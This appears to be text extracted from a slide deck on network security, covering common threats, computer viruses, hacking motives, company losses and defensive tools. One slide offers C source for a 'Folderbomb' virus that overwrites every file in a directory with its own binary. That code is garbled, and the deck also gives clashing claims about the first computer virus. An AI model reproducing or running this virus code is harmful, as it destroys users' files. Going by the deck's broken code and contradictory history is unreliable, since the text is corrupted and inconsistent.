Network security consists of the provisions and policies adopted by a network administrator to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources
2. overview
1. Introduction
3. Common Security Threats
4.Impact of Network security on companies
5. General Strategies and Solutions
6. Security tools
2. Why is Network Security Important?
3. 1-Introduction
• More information is being created,
stored, processed and
communicated using computers
and networks..
• The threats to information are
becoming more widespread
and more sophisticated
• Over the past nine years
people that manage network
security have seen a massive
increase of hackers and
criminals creating malicious
threats that have been
pumped into networks across
the world.
4. • Network security consists of the provisions
and policies adopted by a network administrator to
prevent and monitor unauthorized access, misuse,
modification, or denial of a computer network and
network-accessible resources..
• Network security covers a variety of computer
networks, both public and private, that are used in
everyday jobs conducting transactions and
communications among businesses, government
agencies and individuals.
5. 2-Why is Network Security
Important?
-ability of a system to protect information and
system resources with respect to
confidentiality and integrity
-If the security of the network is compromised,
there could be serious consequences, such as
loss of privacy, theft of information, and even
legal liability.
6. - Specifically, these activities protect the
usability, reliability, integrity, and safety of
your network and data. Effective network
security targets a variety of threats and stops
them from entering or spreading on your
network.
7. -As time went on, and attackers' methods and
tools improved, attackers no longer required
the same level of sophisticated knowledge.
This has effectively lowered the entry-level
requirements for attackers. People who
previously would not have participated in
computer crime are now able to do so.
8. 3- Common Security Threats.
A . Vulnerabilities.
B . Threats to Physical Infrastructure.
C . Threats to Networks .
D . Social Engineering.
E . Malicious Insiders.
F . Careless Employees.
9. A-Vulnerabilities
● Vulnerability is the degree of weakness
which is inherent in every network and
device. This includes routers, switches,
desktops, servers, and even security devices.
● There are three primary vulnerabilities or
weaknesses:
1-Technological weaknesses.
2-Configuration weaknesses.
3-Security policy weaknesses.
10. B-Treats to Physical
Infrastructure
● When you think of network security, or
even computer security, you may imagine
attackers exploiting software vulnerabilities.
A less glamorous, but no less important, class
of threat is the physical security of devices.
An attacker can deny the use of network
resources if those resources can be physically
compromised.
11. C-Threats to Networks
● Unstructured Threats –consist of mostly
inexperienced individuals using easily available
hacking tools, such as shell scripts and password
crackers.
● External threats
● Internal threats
● Structured Threats
12. D-Social Engineering
● Social Engineering :This is a way for an intruder
to gain enough information from people
to gain access to the network.
E-Malicious Insiders
● more delicate data and records are lost when a
there is a network security attack by
an insider.
F-Careless Employees
● poor training for employees and lack of
knowledge on the necessary network security
policies.
16. • The first computer virus was
called “Creeper.”It was
invented in the early
1970’s.Since then, millions
of viruses have been
invented.
• The first known computer
virus was written in 1981 by
a man named Rich Skrenta .
This virus was the first
computer virus to appear
outside the computer
where it was created in.
17. • A Computer Virus is a
program that can copy itself
and infect a computer
without the permission or
knowledge of the user.
• A Computer Virus has two
major characteristics:
• 1-the ability to replicate
itself.
• 2- ability to attach itself to
another computer file...
18. The following are a few Symptoms that your
computer might have a virus:
• Slow response and slow program execution.
• Random hard drive crashes and restarts.
• Distorted graphics and text.
• Files that have mysteriously vanished.
• Inability to open files with existing passwords.
19. Who creates viruses?
1. Information attackers.
2. PROFIT EARNERS
Ex: VIRUS / ANTIVIRUS MARKET.
Why people creates computer viruses?
-To attack the products of specific
companies.
To theft the confidential information.-
-to take revenge.
-release anger.
-for fun.
.-To distribute political messages
-.
20. This is a simple virus program to create a virus in c
It will create Folder in a Folder in a Folder and so on
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{
char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————
————————–”);
printf(”nVirus: Folderbomb
1.0nProgrammer:
BAS Unnikrishnan(asystem0@gmail.com)n”);
cprintf(”————————————————
————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{
printf(”n”);
cprintf(” %s “, ffblk.ff_name);
printf(”is attacked by “);
cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINAR
YO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
21. It places its own codes
and commands into
MBR.
Hacking
22. Hacking refers to the
activities which are done
to intrude some one else’s
personal information so as
to use it for malicious,
unwanted purposes. .
Hacking is a term which
refers to the activities
aimed at exploiting
security flaws to obtain
personal information for
gaining access to secured
networks
23. A typical attacker works in the following manner:
Identify the target system.
Gathering Information on the target system.
Finding a possible loophole in the target system.
Exploiting this loophole using exploit code.
Removing all traces from the log files and escaping
without a trace.
24. 1. Credit Card Information(for money)
In recent years it has become increasingly possible
for hackers to steal credit card information. With
online shopping and online banking becoming more
prevalent, the opportunity for a skilled hacker to
acquire credit card information continues to grow.
2. Identity Theft
Hackers can steal identity by simply hacking into
acomputer. With a stolen identity, a hacker can
do almost everything.
When someone hacks a computer or
network system, it's typically for
one of the following reasons:
25. 3. Business Information
In the modern world important business
information can be stored on computers.
Hackers can steal financial information,
account numbers, and even client information.
4. Egotism
Some hackers hack computers solely to prove
that they can. These individuals may do
anything from small-scale hacking all the way
up to full-on identity
26. Advantages of Hacking …
-Can be used to recover lost information where the
computer password has been lost.
Teaches us that no technology is 100% secure.-
Disadvantages of Hacking …
Criminals can use it to their advantage.-
It can harm someone's privacy.-
It's illegal.-
-It destroys other people’s work..
28. Hackers are just people with innovative spirits and an in-depth
knowledge of technology. Hackers aren't necessarily criminals,
though as long as crime has the potential to pay, there will
always be some criminals who are hackers. There's nothing
wrong with the hacker knowledge itself, despite its potential
applications.
Therefore, do whatever you like as long as you didn’t make other
people suffered and devastated on your own action.
32. 1. FINANCIAL LOSSES
In 2011 ,Sony lost 170 million $ due to a hack of their
PlayStation system. Also in 2011 , CitiGroup lost
2.7million $ and AT&T lost 2 million $ as a result of
hackers
2. LOSS OF INFORMATION
Hacking often results in a loss of data due to
files being deleted or changed. leak of top
secret information could cause real-world
security issues. Servers at the Pentagon,
FBI, Interpol and NASA have all been
compromised at
various points in the past ten years.
-.
33. According to the 2006 computer security institute
(CSI)/FBI Computer Crime and Security Survey:
- 52 percent of respondents reported unauthorized
use of computer systems
- 313 respondents reported total losses of $52 million
due to computer incidents.
-59 percent of respondents reported more than10 Web
site security incidents over a year’s time , and 36 percent
of respondents did not know how many Website security
incidents had occurred.
- Virus incidents were the greatest cause of
financial loss.
34.
35. Four Worst Security Mistakes:
1-Opening unsolicited e-mail attachments without
verifying their source and checking their content
first.
2-Failing to install security patches-especially for
Microsoft Office, Microsoft Internet Explorer, and
Netscape.
3-Installing screen savers or games from unknown
sources.
4-Not making and testing backups.
.
36. 5-Strategies and Solutions.
-virtual private
network (VPN)- links are
provided to provide remote
users secured access to their
intended network
-Secure Sockets
Layer (SSL)- now known as
Transport Layer Security (TLS)
is used to provide data
integrity and security over the
internet
-Hypertext Transfer
Protocol Secure
37. There are some simple steps that should be taken
that apply to most operating systems:
1-Default usernames and passwords should be changed
immediately.
2-Access to system resources should be restricted to only the
individuals that are authorized to use those resources
3-Any unnecessary services and applications should be
turned off and uninstalled, when possible.
4-Install host antivirus software to protect against known
viruses.
5-Install Personal Firewall to prevent attacks on PC.
38. 6-Intrusion detection systems (IDS)- used to detect unauthorized access,
monitor and audit networks.
7-Penetration test- process of testing the security measures of a
computer network.
8-Backup- copy data into another location
9-Business continuity planning (BCP)- organization wide plan that depicts
how an organization will recover from interruptions .
10-Disaster recovery plan (DRP)- an IT related infrastructure recovery .
11-Appropriate use of portable storage devices .
12-Physical security- closed-circuit television cameras, access control
systems.
39.
40. 6- Security tools
1-Antivirus software packages
2- Secure network infrastructure.
3- IDS hardware and software.
4- Identity services.
5-Security management .
6- Virtual private network Secure, private
connection thru a public network Provides a
mechanism for secure data transmission .
7- Encryption .
8-Firewall.
41.
42. Conclusion
● Regular auditing of IT infrastructure, regular
penetration test and periodic examination of the
company’s BCP .
● Network security starts with action from
individual .
● It’s not a product, it's a process.
● Network security is the responsibility of everyone.
It is better to prevent threats than to get rid of.